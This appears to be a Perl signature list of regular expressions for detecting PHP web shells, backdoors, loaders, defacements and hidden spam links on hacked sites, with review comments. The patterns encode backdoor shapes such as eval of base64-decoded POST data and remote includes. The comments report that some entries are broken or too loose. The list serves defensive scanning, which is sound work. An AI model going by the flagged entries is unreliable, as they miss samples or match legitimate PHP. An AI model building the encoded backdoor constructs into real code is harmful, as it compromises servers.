qr/<\?php\s+\$([A-z0-9]{1,20})\_([A-z0-9]{1,20})\s+\=\s+array\(.+?array\(\'bas.+?array\(\'gzu.+?eval.+?\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\$.+?WP\_Error\_Page\_Not\_Found.+?\(\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\)\;\}\}\}\}\}\}\}\}\;/is,
qr/<\?php\s+error\_reporting\(0\)\;echo\(\"Form.+?\{if\(\@copy\(\$\_FILES\[\'file\'\]\[\'tmp\_name\'\].+?<br>\'\;\}\}\;\}\;/is,
# Signature: PHP loader that assembles the name "strrev" from
# single-character strings, followed by array( and eval.
# NOTE(review): the tail "eval\?>" only matches the literal text "eval?>"
# with nothing in between. The otherwise similar entry further down this
# list ends in "eval.+?\?>", so this one has presumably lost its ".+?" and
# may never match a real sample -- confirm and repair.
qr/<\?php\s+\$([A-z0-9]{1,20})\_([A-z0-9]{1,20})\s+\=\s+\'s\'\.\'t\'\.\'r\'\.\'r\'\.\'e\'\.\'v\'\;\$.+?array\(.+?eval\?>/is,
qr/<\?php\s+\$IonTester\s+\=\s+<<<EOT.+?EOT\;\s+\$Keys\s+\=\s+\$\_GET\[.+?\$run\_ioncubetesterplus\s+\=\s+create\_function\(\'\'\,\s+\"\\x.+?\$run\_ioncubetesterplus\(\)\;\s+\?>/is,
qr/if\(\s+isset\(\$\_REQUEST\[\"test\_url\"\]\)\s+\)\{.+?\$data\s+\=\s+base64\_decode\(.+?die\(.+?\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\"\_([A-z0-9]{1,20})\"\s+\;\$([A-z0-9]{1,20})\s+\=strtoupper\(\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\.\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\s+\)\;\s+if\(\s+isset\(\s+\$\{\$([A-z0-9]{1,20})\}\[\s+\'([A-z0-9]{1,20})\'\s+\]\)\)\s+\{\s+eval\(\$\{\s+\$([A-z0-9]{1,20})\}\s+\[\s+\'([A-z0-9]{1,20})\'\s+\]\s+\)\s+\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$([A-z0-9]{1,20})\[\d\d\]\.\$([A-z0-9]{1,20})\[\d\d\].+?\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$([A-z0-9]{1,20})\[\d\d\]\.\$([A-z0-9]{1,20})\[\d\d\].+?\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$([A-z0-9]{1,20})\[\d\d\]\.\$([A-z0-9]{1,20})\[\d\d\].+?\+\=\s+1\;\s+\}\s+return\s+\$([A-z0-9]{1,20})\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\"([A-z0-9]{1,20})\_([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=\s+strtolower\(\$([A-z0-9]{1,20})\[\d\d\]\..+?\$([A-z0-9]{1,20})\s+\=strtoupper\(\$([A-z0-9]{1,20})\[\d\]\..+?\{\s+eval\(\$([A-z0-9]{1,20})\(.+?\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\"([A-z0-9]{1,20})\_\"\s+\;\$([A-z0-9]{1,20})\s+\=\s+strtoupper\(\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\.\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\s+\)\;\s+if\(\s+isset\(\s+\$\{\$([A-z0-9]{1,20})\}\[\s+\'([A-z0-9]{1,20})\'\s+\]\)\)\s+\{\s+eval\(\$\{\s+\$([A-z0-9]{1,20})\}\s+\[\s+\'([A-z0-9]{1,20})\'\s+\]\s+\)\s+\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?strtoupper\(\$([A-z0-9]{1,20})\[.+?isset\(.+?eval\(.+?\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?strtoupper\(\$([A-z0-9]{1,20})\[.+?isset\(.+?eval\(.+?\}\?>/is,
qr/<\?php\s+\$.+?\'s\'\.\'t\'\.\'r\'\.\'r\'\.\'e\'\.\'v\'\;\$.+?array\(.+?eval.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?strtoupper.+?isset\(.+?eval\(.+?\[\'([A-z0-9]{1,20})\'\].+?\?>/is,
qr/<\?php\s+\$.+?\'gzu\'.+?array\(.+?eval\(.+?\?>/is,
qr/<\?php\s+\$.+?\'bas\'.+?array\(.+?eval\(.+?\?>/is,
qr/<\?php\s+\@eval\(base64\_decode\(([A-z0-9]{20,})\)\)\;\?>/is,
qr/<\?php.+?\$\{\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"\}.+?\?>/is,
qr/<\?php\s+\@error\_reporting\(0\)\;\@ini\_set\(.+?\{eval\(mcrypt\_decrypt\(MCRYPT\_RIJNDAEL\_256.+?\]\)\,MCRYPT\_MODE\_ECB\)\)\;\}exit\;\?>/is,
qr/<\?php.+?eval\(base64\_decode\(str\_rot13\(strrev\(base64\_decode\(str\_rot13\(\$\_POST\[\'.+?\'\]\)\)\)\)\)\)\;.+?print\s+\$pageData\;\s+\}\s+curl\_close\(\$ch\)\;\s+\?>/is,
qr/<\?php\s+\/\*\*.+?\@package\s+WordPress.+?\*\/\s+\@eval\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\s+\?>/is,
qr/function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\{if\(is\_array\(\$([A-z0-9]{1,20})\)\)\{foreach\(\$([A-z0-9]{1,20})\s+as.+?\$([A-z0-9]{1,20})\=base64\_decode\(\$([A-z0-9]{1,20})\)\;eval\(\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\=null\;\}.+?if\(empty\(\$\_SERVER\)\)\$\_SERVER\=\$HTTP\_SERVER\_VARS\;array\_map\(\"([A-z0-9]{1,20})\"\,\$\_SERVER\)\;/is,
qr/<\?php\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\"\\x.+?\$GLOBALS\[\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\.\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\.\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\..+?return\s+\$GLOBALS\[\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\.\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\.\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\..+?eval\(\$([A-z0-9]{1,20})\[\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\]\)\;\s+\}\s+exit\(\)\;\s+\}/is,
qr/<\?php.+?\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})b([A-z0-9]{1,20})a([A-z0-9]{1,20})s([A-z0-9]{1,20})e([A-z0-9]{1,20})6([A-z0-9]{1,20})4([A-z0-9]{1,20})\_([A-z0-9]{1,20})d([A-z0-9]{1,20})e([A-z0-9]{1,20})c([A-z0-9]{1,20})o([A-z0-9]{1,20})d([A-z0-9]{1,20})e([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=str\_ireplace\(\"\w\"\,.+?user\_error\(\$([A-z0-9]{1,20})\,E\_USER\_ERROR\)\;.+?\/\*\s+([A-z0-9]{1,20})\s+\*\/\s+\?>/is,
qr/<\?php\s+eval\(eval\(\"\\\$\_([A-z0-9]{20,})\s+\=\s+\\x.+?([A-z0-9]{1,20})\s+\:\s+\'\s+\.\s+\\\$\_([A-z0-9]{20,})\;\}\"\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'c\'\;\$([A-z0-9]{1,20})\=\'n\'\;\$([A-z0-9]{1,20})\=\'4\'\;\$([A-z0-9]{1,20})\=\'f\'\;\$([A-z0-9]{1,20})\=\'z\'\;\$([A-z0-9]{1,20})\=\'d\'\;\$([A-z0-9]{1,20})\=\'s\'\;\$([A-z0-9]{1,20})\=\'6\'\;\$([A-z0-9]{1,20})\=\'b\'\;\$([A-z0-9]{1,20})\=\'i\'\;\$([A-z0-9]{1,20})\=\'o\'\;\$([A-z0-9]{1,20})\=\'e\'\;\$([A-z0-9]{1,20})\=\'a\'\;\$([A-z0-9]{1,20})\=\'t\'\;\$([A-z0-9]{1,20})\=\'\_\'\;\$([A-z0-9]{1,20})\=\'l\'\;\$([A-z0-9]{1,20})\=\'g\'\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\;eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(.+?\'\)\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\$\_COOKIE\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\[([A-z0-9]{1,20})\]\;\s+if\(\$([A-z0-9]{1,20})\)\{\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\[([A-z0-9]{1,20})\]\)\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\[([A-z0-9]{1,20})\]\)\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\"\"\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?\'st\'.+?array\(.+?eval\(.+?\;\s+\?>/is,
qr/<\?php\s+eval\(eval\(\"\\\$\_([A-z0-9]{20,})\s+\=\s+\\x.+?\\\"\)\;\s+eval\(\\\$\_([A-z0-9]{20,})\)\;\"\)\)\;/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\{\$([A-z0-9]{1,20})\s+\=\s+\'\'\;\s+for\(\$i\=0\;\s+\$i\s+<\s+strlen\(\$([A-z0-9]{1,20})\)\;\s+\$i\+\+\)\{\$([A-z0-9]{1,20})\s+\.\=\s+isset\(\$.+?\$([A-z0-9]{1,20})\=\"base64\_decode\"\;return\s+\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\}.+\$([A-z0-9]{1,20})\s+\=\s+Array\(\'.+?\)\;\s+eval\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\)\;\?>/is,
qr/<\?php\s+isset\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\s+\&\&\s+\(\$([A-z0-9]{1,20})\=\s+\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\s+\&\&\s+\@preg\_replace\(\'\/([A-z0-9]{1,20})\/\w\'\,\'\@\'\.str\_rot13\(\'riny\'\)\.\'\(\$([A-z0-9]{1,20})\)\'\,\s+\'([A-z0-9]{1,20})\'\)\;/is,
qr/<\?php\s+if\(isset\(\$\_GET\[.+?\]\)\?base64\_decode\(\$\_GET\[\'([A-z0-9]{1,20})\'\]\)\:\'\'\;.+?foreach\(array\(\$([A-z0-9]{1,20})\)\s+as\s+\$([A-z0-9]{1,20})\)\{.+?ob\_end\_flush\(\)\;\s+\}/is,
# Signature: PHP backdoor gated by an md5() comparison of a $_POST field
# that then passes a $_POST value to array_walk() as the callback.
# NOTE(review): near the end, "\,s+\'\'" matches a comma followed by one or
# more literal "s" characters, not whitespace. Other entries in this list
# write that gap as "\,\s+", so a backslash was most likely dropped and the
# signature cannot match syntactically valid PHP as written. The intended
# form is presumably "\,\s+\'\'" -- confirm against a sample.
qr/<\?php\s+if\s+\(md5\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\=\=\=\'.+?if\(isset\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\&\&isset\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\s+\=\s+array\(\$([A-z0-9]{1,20})\.\$\_POST\[\'([A-z0-9]{1,20})\'\].+?array\_walk\(\$([A-z0-9]{1,20})\,\s+strval\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\,s+\'\'\)\;\}\}\s+\?>/is,
qr/function\s+stripDangerousValues\(\$input\)\s+\{.+?\$\_POST\s+\=\s+stripDangerousValues\(\$\_POST\)\;/is,
qr/<\?php.+?\$rootpath\s+\=\s+preg\_replace\(\'\/\(htdocs\|httpdocs\|www\)\(\.\*\)\/\'\,\'\$1\'\,dirname\(\$\_SERVER\[\"SCRIPT\_FILENAME\"\]\)\)\;.+?return\s+\$result\;\s+\}\s+\?>/is,
qr/<\?php\s+\$urls\s+\=\s+array\s+\(\s+\'http\:\/\/.+?\)\;\s+\$URL\s+\=\s+\$urls\[rand\(0\,\s+count\(\$urls\)\s+\-\s+1\)\]\;\s+header\s+\(\"Location\:\s+\$URL\"\)\;\s+\?>/is,
qr/<\?php\s+if\s+\(md5\(\$\_POST\[.+?\'bas\'\.\'e6\'\.\'4\_d\'\.\'ec\'\.\'ode\'\;.+?array\_walk\(.+?\)\;\}\}\s+\?>/is,
qr/<\?php.+?move\_uploaded\_file\(\$file\,\s+\$name\)\;\s+\}else\{\s+\?>.+?action\=\"<\?\$\_SERVER\[\'PHP\_SELF\'\]\?>\">.+?require\_once\(dirname\(\_\_FILE\_\_\)\.DS\.\'index\.php\'\)\;\s+\?>/is,
qr/Goog1e\_analist\_up<\?php\s+\$.+?\)\{eval\(\$.+?\)\{system\(\$.+?\)\{move\_uploaded\_file\(\$\_FILES\[.+?\]\[\'name\'\]\)\;\}\?>/is,
qr/<\?php\s+function\s+d\(\$.+?\$d\.\=chr\(hexdec\(substr\(\$.+?\}\}eval\(d\(\".+?\)\)\;\s+\?>/is,
qr/<style\s+type\=\"text\/css\">.+?Lampungcarding.+?\$currentCMD.+?exit\;\s+\?>.+?<\/title>/is,
qr/<\!\-\-<\?php\s+if\(\@\$\_REQUEST\[.+?Goog1e\_analist\_certs.+?\{eval\(base64\_decode\(\$.+?\)\{move\_uploaded\_file\(\$.+?\?>\-\->/is,
qr/<\?php\s+if\(isset\(\$\_GET\[\'.+?Goog1e\_analist\_certs.+?\]\)\)\{eval\(base64\_decode\(\$\_POST\[.+?\]\)\;\}\}\?>/is,
# Signature: generic "<?php $var ... isset( ... eval( ... 'token' ... ?>"
# shape.
# NOTE(review): this is a very loose pattern. Under /s the lazy ".+?" gaps
# cross newlines, so any text that opens with "<?php $name" and later
# contains "isset(", "eval(", a short single-quoted token and "?>" in that
# order will match, however far apart they are. The three whitespace
# variants that follow behave the same way. How a match is consumed is not
# visible in this part of the file; if the matched span is removed
# automatically, legitimate PHP could be deleted. Consider report-only
# handling or a length bound on the gaps for these generic entries.
qr/<\?php\s+\$([A-z0-9]{1,20}).+?isset\(.+?eval\(.+?\'([A-z0-9]{1,20})\'.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\".+?\"\;\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$\{\$([A-z0-9]{1,20})\[\d\d\]\.\$([A-z0-9]{1,20})\[\d\d\].+?\{\s+break\;\s+\}\s+\}\s+return\;\s+\}\s+if\s+\(isset\(\$GLOBALS\[.+?\{\s+echo\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\(([A-z0-9]{1,20})\)\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?isset\s+\(.+?eval\s+\(.+?\'([A-z0-9]{1,20})\'.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?isset\s+\(.+?eval\(.+?\'([A-z0-9]{1,20})\'.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?isset\(.+?eval\s+\(.+?\'([A-z0-9]{1,20})\'.+?\?>/is,
qr/<\?php.+?\$([A-z0-9]{1,20})\s+\=.+?eval\(\"\?>\"\.gzuncompress\(base64\_decode\(\$([A-z0-9]{1,20})\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$.+?\=urldecode\(.+?eval\(\$GLOBALS\[.+?\?><\?php\s+\/\*\s+([A-z0-9]{1,20})\s+\*\/\$.+?eval\(\$.+?\/([A-z0-9]{1,20})\=([A-z0-9]{1,20})\Z/is,
qr/<\?php\s+\$f\s+\=\s+fopen\(.+?echo\s+\"HACKED\s+BY.+?\?>/is,
qr/<\?php\s+\/\*.+?\$homedir\s+\=\s+\'\.\/\'\;.+?case\s+\'upload\'\:\s+\$dest\s+\=\s+relative2absolute\(\$file\[\'name\'\]\,\s+\$directory\)\;.+?\.php\_uname\(\)\.\'<br><\/b>\'\;\s+\?>/is,
qr/<\?php\s+eval\(\$\_POST\[([A-z0-9]{1,20})\]\)\?>/is,
qr/<\?php\s+if\(\!function\_exists\(\'findsysfolder\'\)\)\{function\s+findsysfolder\(\$.+?clearstatcache\(\)\;if\(\!is\_dir\(\$.+?eval\(.+?\)\)\;\?>/is,
qr/<\?php.+?system\s+file\s+do\s+not\s+delete.+?eval\(\$\_\_\_\(\$\_\_\)\)\;/is,
qr/<\?php\s+if\s+\(isset\(\$\_GET\[\"([A-z0-9]{1,20})\"\]\)\)\s+die\(\$\_GET\[\"([A-z0-9]{1,20})\"\]\)\;\s+if\s+\(isset\(\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\)\s+\{\s+eval\(base64\_decode\(\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\)\;\s+exit\;\s+\}\s+\?>/is,
qr/<\?php\s+define\(\'CONFIG_FILE\'\,\s+\'\/images\/config\.db\'\)\;.+?function\s+getLinks\(\$server\_host\,\s+\$server\_port\,\s+\$path\,\s+\$key\).+?process\(\)\;\s+\?>/is,
qr/<\?php.+?Array\(\)\;global\s+\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+\$GLOBALS\;\$\{\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"\}\[.+?\{eval\/\*([A-z0-9]{1,20})\*\/\(\$.+?\}exit\(\)\;\}\s+\?>/is,
qr/<\?php.+?\]\)\?base64\_decode\(\$\_GET\[.+?ob\_end\_flush\(\)\;/is,
qr/\*\/\s+\$\w\=\@\$\w\(\'\'\,strrev\(\'\;\)\)\]B2D2C\_PTTH\[REVRES\_\$\(edoced\_46esab\(lave\'\)\)\;\@\$\w\(\)\;\s+\/\*/is,
qr/\#\!\/usr\/bin\/perl\s+\-w\s+\'\'\=\~\(\'\(\?\{\'\.\(\'.+?\'\)\.\'\$\/\}\)\'\);/is,
qr/\*\/if\(\@isset\(\$\_SERVER\[HTTP\_25F0C\]\)\)\{\@eval\(base64\_decode\(\$\_SERVER\[HTTP\_25F0C\]\)\)\;\}\/\*/is,
qr/<\?php\s+\$.+?\'str\'\.\'rev\'\;\$.+?array\(.+?eval\(.+?\?>/is,
qr/<\?php\s+\$.+?\'gzun\'\.\s+\'comp\'\.\s+\'ress\'\;\$.+?\'ba\'\s+\.\'se\'\s+\.\'64\'\s+\.\'\_d\'\s+\.\'ec\'\s+\.\'od\'\s+\.\'e\'\;\$.+?\'im\'\s+\.\'pl\'\s+\.\'od\'\s+\.\'e\'\;\$.+?array\(.+?eval\(.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\\x66lat\\x65\(b\"\.chr\(97\)\.\"se64\"\.chr\(95\)\.\"\"\.chr\(100\)\..+?\"([0-9]{1,20})\"\);/is,
qr/<\?php.+?Leaf\s+PHP\s+Mailer.+?leafmailer\.pw.+?print\s+\'<\/body>\'\;\s+\?>/is,
qr/<u\s+style\=\"position\:\s+absolute\;\s+width\:\s+1px\;\s+height\:\s+1px\;\s+margin\:\s+0\;\s+top\:\s+\-1000px\;\s+left\:\s+\-5000px\;\s+overflow\:\s+hidden\;\">.+?pornstar.+?gay.+?www\..+?<\/h1><\/a>.+?<\/u>/is,
qr/<\?php\s+error\_reporting\(.+?\@include\(\$\_FILES\[\'u\'\]\[\'tmp\_name\'\]\)\;.+?header\(\"HTTP\/1\.0\s+404.+?exit\(\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\@assert\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?array\(\'bas\'\s+\,\'e64\'\s+\,\'\_de\'\s+\,\'cod\'\s+\,\'e\'\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+array\(\'gzun\'\,\s+\'comp\'\,\s+\'ress\'\)\s+\;\$.+?eval.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?array\(\'bas\'\s+\,\'e64\'\s+\,\'\_de\'\s+\,\'cod\'\s+\,\'e\'\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+array\(\'gz\'\,\s+\'un\'\,\s+\'co\'\,\s+\'mp\'\,\s+\'re\'\,\s+\'ss\'\)\s+\;\$.+?eval.+?\?>/is,
qr/<\?php\s+ignore\_user\_abort\(1\)\;.+?echo\s+ex\(\"cd\s+\/dev\/shm\;rm\s+([A-z0-9]{1,20})\.txt\"\)\;\s+\?>/is,
# Signature: the bare snippet <?php echo "test"; ?>.
# NOTE(review): this text is not malicious by itself; presumably it is
# listed because it shows up as a leftover upload/write probe. Expect hits
# in harmless files -- confirm that treating it like the other entries is
# intended, or restrict it to files that contain nothing else.
qr/<\?php\s+echo\s+\"test\"\;\s+\?>/is,
qr/<\?php\s+print\s+\"\_\_code\_\_\"\;\s+\?>/is,
qr/<\?php\s+system\(\$\_GET\[\"([A-z0-9]{1,20})\"\]\)\;\s+\?>/is,
qr/<\?php\s+system\(\$\_SERVER\[\"HTTP\_SHELL\"\]\)\;\s+\?>/is,
qr/<\?php\s+eval\(stripslashes\(\$\_REQUEST\[\".+?\"\]\)\)\;\s+\?>/is,
qr/<\?php\s+\@include\(\"http\:\/\/pastie\.org\/([A-z0-9]{1,20})\.txt\"\)\;\s+\?>/is,
qr/<\?php\s+\@include\(\"http\:\/\/.+?\.txt\"\)\;\s+\?>/is,
qr/<\?php\s+\$files\s+\=\s+\@\$\_FILES\[\"files\"\]\;.+?OK\-Click\s+here\!.+?<title>Upload\s+files<\/title>.+?\?>/is,
qr/<\?php\s+ignore\_user\_abort\(true\)\;.+?\$unzip\_path\s+\=\s+\$dir\_path\.\'unzip\.php\'\;.+?echo\s+getURL\(\$url\)\;\s+\}\s+exit\;\s+\}\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+function\s+http\_get\(\$url\)\{.+?\/wp\-includes\/wp\-footer\.php.+?\/wp\-admin\/shapes\.php.+?https\:\/\/hastebin\.com\/raw\/.+?fclose\(\$op3\)\;\s+\?>/is,
qr/<\?php\s+function\s+http\_get\(\$url\)\{.+?\/wp\-includes\/wp\-footer\.php.+?\/wp\-admin\/shapes\.php.+?https\:\/\/pastebin\.com\/raw\/.+?\?>/is,
qr/<\?php\s+if\(\$\_POST\[\'Copy\'\]\)\{\s+\$\_\=\"b\"\/\*\*\/\.\"ase64\_decode\"\;\s+preg\_replace\(\"\/\^\/e\"\,\$\_\(\".+?\"\)\,0\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$this\->zipname\s+\=\s+\$p\_zipname\;.+?\$archive\s+\=\s+new\s+PclZip\(\"orppxie\.zip\"\)\;.+?else\s+\{\s+die\(\"1425756856\"\)\;\s+\}/is,
qr/<\?php.+?\/\/PASSWORD\s+CONFIGURATION.+?if\(\!function\_exists\(.+?\)\)\;\?>\'\)\)\;\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;ob\_clean\(\)\;if\(\!function\_exists\(\'str\_ireplace\'\)\)\{function\s+str\_ireplace\(\$a\,\$b\,\$c\)\{return\s+trim\(preg\_replace\(\"\/\"\.addcslashes\(.+?str\_replace\(\'\{.+?\;\}\}\?>/is,
qr/RewriteEngine\s+On\s+RewriteRule\s+\^\(topic\|hot\|updated\|free\|review\|rewrite\)\-\(\.\*\)\s+index\.php\?\$1\=\$2\s+\[L\]/is,
qr/<\?php\s+function\s+DirFilesR\(\$dir\).+?<title><\?php\s+echo\s+\$\_SERVER\[\'SCRIPT\_FILENAME\'\]\;\?><\/title>.+?\$k\+\+\;\s+\}\s+\?>\s+<\/table>/is,
qr/<HTML>.+?<title>Hacked\s+by\s+Mister\s+Spy<\/title>.+?dQ\_\-z9pTRL6tA2kqbnXH6A\.jpg\'>/is,
qr/<\?php.+?\?>\%x.+?\/\(\.\*\)\/epreg\_replace.+?\$([A-z0-9]{1,20})\s+\=\s+explode\(chr\(\(.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php.+?\$mosimage\_session\s+\=.+?\$mosimage\_category\_session\(\"\/\.\*\/e\"\,\"\\x.+?\\x3B\"\,\"\.\"\)\;\s+\?>/is,
qr/\$([A-z0-9]{1,20})\s+\=\s+\"\\x.+?\$([A-z0-9]{1,20})\s+\=\s+\"\\x.+?\@eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(.+?\)\)\)\)\;/is,
qr/<\?php\s+ini\_set\(\'include\_path\'\,dirname\(\_\_FILE\_\_\)\)\;function.+?\'sprintf\'\)\=\=false\)\?false\:exit\(\)\:exit\(\)\:exit\(\)\:exit\(\)\)\;\}function.+?\)\)\{unlink\(\$.+?\}\s+ini\_set\(\'include\_path\'\,\'\.\'\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\;/is,
qr/<\?php\s+\$auth\_pass\=\"\".+?x3B\"\,\"\.\"\)\;\?>/is,
qr/<\?php\s+\$\w\s+\=\s+\"b\"\.\"\"\.\"as\"\.\"e\"\.\"\"\.\"\"\.\"6\"\.\"4\"\.\"\_\"\.\"de\"\.\"\"\.\"c\"\.\"o\"\.\s+\"\"\.\"d\"\.\"e\"\;\s+assert\(\$\w\(.+?\)\)\;\s+\?>/is,
qr/<\?php\s+if\(\!isset\(\$GLOBALS\[\"\\x.+?\]\)\)\s+\{\s+\$ua\=strtolower\(\$\_SERVER\[\"\\x.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+class.+?\=base64\_DEcODE\(self\:\:\$\_.+?\(\'\_\'\.\'.+?\'\)\]\)\;endif\;exit\;/is,
qr/<\?php.+?Black\-ID\@W\.Cn.+?preg\_replace\(\"\\x.+?\"\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\'\)\;if\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\)\)\=\=\$.+?\*\/\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(false\,\$([A-z0-9]{1,20})\(\$.+?\'\;/is,
qr/<\?php\s+if\(empty\(\$\_GET\[\'ineedthispage\'\]\)\)\{ini\_set\(\'display\_errors\'\,\"Off\"\)\;ignore\_user\_abort\(.+?\}\}closedir\(\$dir\)\;rmdir\(\$directory\)\;\}\;\s+\/\/item\->alias\s+\?>/is,
qr/<\?php.+?\$pathToDor\s+\=\s+\"\/nsw\-uk\".+?\$cookie\_name\s+\=\s+\'UTCSESSID\'\;.+?setcookie\(\$cookie\_name\,md5\(uniqid\(\)\)\,0\,\'\/\'\,\$cookieDomain\)\;.+?\$curl\_loops\=0\;\s+return\s+\$data\;.+?\?>/is,
qr/<\?php\s+if\(strpos\(strtolower\(\$\_SERVER\[\'REQUEST\_URI\'\]\)\,\'nsw\-uk\'\)\)\{\s+include\(getcwd\(\)\.\'\/version\.php\'\)\;\s+exit\;\}\s+\?>/is,
qr/<\?php\s+if\s+\(\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\{eval\(base64\_decode\(\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\)\;exit\;\}\s+if\(isset\(\$\_GET\[\"([A-z0-9]{1,20})\"\]\)\)\{echo\s+\"([A-z0-9]{1,20})\s+\:\s+([A-z0-9]{1,20})\=\"\;exit\;\}\s+\?>/is,
